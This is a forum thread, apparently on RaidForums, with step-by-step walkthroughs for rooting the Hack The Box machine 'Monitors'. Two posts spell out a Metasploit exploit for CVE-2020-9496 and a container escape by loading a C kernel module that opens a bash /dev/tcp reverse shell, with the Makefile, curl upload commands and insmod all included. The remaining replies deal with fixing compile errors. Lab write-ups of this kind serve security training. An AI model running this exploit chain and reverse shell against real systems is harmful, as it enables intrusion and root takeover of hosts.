TUTORIAL Monitors: root part for free
by siracuso - April 26, 2021 at 12:47 PM
#1
Hi, I'm back to share how to root monitors htb machine step by step. Ready?

It is supposed that you already have ssh password for user marcus. If not, check my user write up at https://raidforums.com/Thread-Tutorial-M...t-for-free

We'll need to map some ports to internal docker container through ssh 
ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 [email protected]

You can check what is on port 8443 once mapped entering to the url https://127.0.0.1:8443/ it is tomcat 9.0.31 which is vulnerable to CVE-2020-9496. We'll use metasploit

msfconsole
use linux/http/apache_ofbiz_deserialiation
set rhosts 127.0.0.1
set lhost 10.10.x.x
set forceexploit true
run

A meterpreter session is opened now, interact with it in metasploit, type "shell" to get a simple shell inside the container. Now let's see how to escape. Followed this tutorial: https://blog.pentesteracademy.com/abusin...5c29956edd

To follow that steps is easy, anyway, the explanation is that docker containers share kernel with host. And from that docker container, the ability to install kernel modules is enabled, so we can create an evil kernel module to get root shell on the host. Here it is summarized: 

1. Create on your local linux a file called reverse-shell.c with this content (note that the ip and port changed from the tutorial. We'll use the remote host machine ip)

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.1/4443 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

2. Create on your local linux a file called Makefile with this content: 
obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

3. We need to compile it on remote container, so to upload it. first create a simple python webserver using
python3 -m http.server 80

4. Now from the remote container shell, launch these commands (setting your ip) to upload the needed files to the remote container (don't worry about curl warnings)
cd /tmp
curl -L http://10.10.x.x/reverse-shell.c -O /tmp/reverse-shell.c
curl -L http://10.10.x.x/Makefile -O /tmp/Makefile

5. Let's compile there using "make" command. A new file called reverse-shell.ko will appear

6. Set up a netcat listener on the port you put on reverse-shell.c file. The listener must be on the remote ubuntu host machine on the marcus ssh session shell

nc -lnvp 4443

7. Install the evil created kernel module on the remote container. It will trigger the shell we'll receive on the listener for the remote host machine and the root flag now can be get as usual

insmod reverse-shell.ko

Enjoy! and feel free to give some reputation if you liked the tutorial :)
Reply
#2
You only need -L for port forward and not -R
Reply
#3
Metasploit shell is not stable!
It's getting me error!
Reply
#4
got meterpreter session but getting an error whenever trying to use the shell.

meterpreter > shell
[-] Unknown command: shell.
Reply
#5
i can't get shell
errors
ssh : channel 3: open failed: connect failed: Connection refused
msf : [-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
Reply
#6
(April 26, 2021 at 04:25 PM)wizardhulk Wrote: got meterpreter session but getting an error whenever trying to use the shell.

meterpreter > shell
[-] Unknown command: shell.
meterpreter is unstable, use simple revshell

use linux/http/apache_ofbiz_deserialiation
set rhosts 127.0.0.1
set lhost tun1
set lport 8444
set forceexploit true
set payload linux/x64/shell/reverse_tcp
run

and after upgrade it with python
python -c 'import pty; pty.spawn("/bin/bash")'
Reply
#7
Again facing problem with make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
CC [M] /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#
Reply
#8
Road to root
Seems I cannot run sudo on the box
But we have a note.txt worth looking at

TODO:

`Disable phpinfo in php.ini - DONE
Update docker image for production use -
`
So we have a docker image that we can misuse
I had run linpeas script earlier and I noticed something
`
cat www/linpeas.out | grep docker
/usr/bin/docker
root 1879 0.0 0.1 110132 5152 ? Sl Apr24 0:04 _ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/8832c151081f51190d464c193a08645810e3e71b31c75c8dee7cd221bc97323a -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1383 0.0 2.0 902200 83388 ? Ssl Apr24 0:23 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1870 0.0 0.1 480780 4024 ? Sl Apr24 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8443 -container-ip 172.17.0.2 -container-port 8443
-rwxr-xr-x 1 root root 3743536 Sep 16 2020 /usr/bin/docker-proxy
-rwxr-xr-x 1 root root 102075464 Sep 16 2020 /usr/bin/dockerd
[ + ] docker
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
172.17.0.0 0.0.0.0 255.255.0.0 U 0 0 0 docker0
[+] Searching docker files
[i] https://book.hacktricks.xyz/linux-unix/p...ker-socket
srw-rw---- 1 root docker 0 Apr 24 21:03 /run/docker.sock
`
The user root makes a docker proxy run on port 8443 which we can Reverse tunnel using ssh to investigate the docker container.
We use this command in a new terminal
`
ssh -L 8443:127.0.0.1:8443 -R 9001:127.0.0.1:9001 -R 8000:127.0.0.1:8000 [email protected]
`
We enter the password and we see if our ports are open
`
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN
tcp6 0 0 ::1:8443 :::* LISTEN
`
We see it worked..now for investigation

# Port 8443
Navigating to https://127.0.0.1:8443, we find a 404 page (after accepting the SSL certificate) but we find something else
It is running Apache Tomcat 9.0.31 which is an older version looking for CVES that relate to docker containers

We find a recent one which turns to be a rabbit hole
Asked around and found it was subject to CVE-2020-9496
Here is an awesome article explaining it: https://www.zerodayinitiative.com/blog/2...usted-data

Let see if we have an exploit..
I find a certain metasploit module
An Apache Deserialization allows us to force our way into a docker container

So lets see if I can use it
`
msf6 exploit(multi/handler) > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialization) >
`
It appears to work after a few setting
`
set rhosts 127.0.0.1
set lport <any>
set target 0 [Not one]
run
`
The shell is really unstable if you dont have a shell try again until you
get one which is blank..You should see something like this
`
[*] Command shell session 6 opened (10.10.14.221:9001 -> 10.129.104.212:49136) at 2021-04-26 19:41:15 +0300
`
Set a nc listener on any port
The slap your bash shell on a nc listener
`
/bin/bash -c "bash -i >& /dev/tcp/10.10.14.*/<port> 0>&1"
`
We get a shell!
`
[email protected]:/usr/src/apache-ofbiz-17.12.01#
It looks as if we are in a docker container
Lets escape out of it

Escaping docker container
Got a nice website to escape the container: https://blog.pentesteracademy.com/abusin...5c29956edd

Following the steps:

1:lets see if we can find its vulnerability
``[email protected]:/# capsh --print
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=``

We have the sys_module capability..so we can do it
As a result, the container can insert/remove kernel modules in/from the kernel of the Docker host machine

2: Find the ip address
Dont worry we can get it by using the victim machines ip
ip a
IP : Machine IP

3 : Build the exploit
Reverse shell.c
``
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/MACHINE-IP/4443 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
``
4: Creating a MakeFile
``
obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
``
5: Moving the file to the container and making it
Start a python3 http server in the same folder as the exploit and the make file and move them to the container's tmp folder
Make a directory called temp and cd into it
When your are done go to the SSH connection and listen using netcat on port 4443
Now run the make command
``make
``
We get some new files
``
ls
Makefile
Module.symvers
modules.order
reverse-shell.c
reverse-shell.ko
reverse-shell.mod.c
reverse-shell.mod.o
reverse-shell.o
``
We run the .ko file
``
insmod reverse-shell.ko
``
We get root in our netcat
``[email protected]:/
``
Reply
#9
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing problem with make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

same problem bro. DO you find any sollution ???
Reply
#10
(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing problem with make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

same problem bro. DO you find any sollution ???

Take a look in the Blog post given and take the spaces with. Helped me to take the "             " with in the file.
Reply
#11
(April 26, 2021 at 07:36 PM)Bumper Wrote:
(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing problem with make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

same problem bro. DO you find any sollution ???

Take a look in the Blog post given and take the spaces with. Helped me to take the "             " with in the file.


If you can help me exact where should I look that would be very great.

(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing problem with make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

same problem bro. DO you find any solution ???


Any luck?
Reply
#12
(April 26, 2021 at 07:53 PM)wizardhulk Wrote:
(April 26, 2021 at 07:36 PM)Bumper Wrote:
(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing problem with make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

same problem bro. DO you find any sollution ???

Take a look in the Blog post given and take the spaces with. Helped me to take the "             " with in the file.


If you can help me exact where should I look that would be very great.

(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing problem with make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

same problem bro. DO you find any solution ???


Any luck?

Nope, I have tried space thing but same issue
 
obj-m +=reverse-shell.o
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL Monitors HTB Detailed Writeup 0xmahesh 0 772 April 29, 2021 at 03:27 PM
Last Post: 0xmahesh
TUTORIAL Monitors Detailed Writeup Jockerjock 1 753 April 29, 2021 at 03:23 PM
Last Post: 0xmahesh
TUTORIAL Monitors: user part for free siracuso 9 1,800 April 28, 2021 at 04:32 PM
Last Post: rasengan

 Users browsing this thread: shadowhunter1337, 2 Guest(s)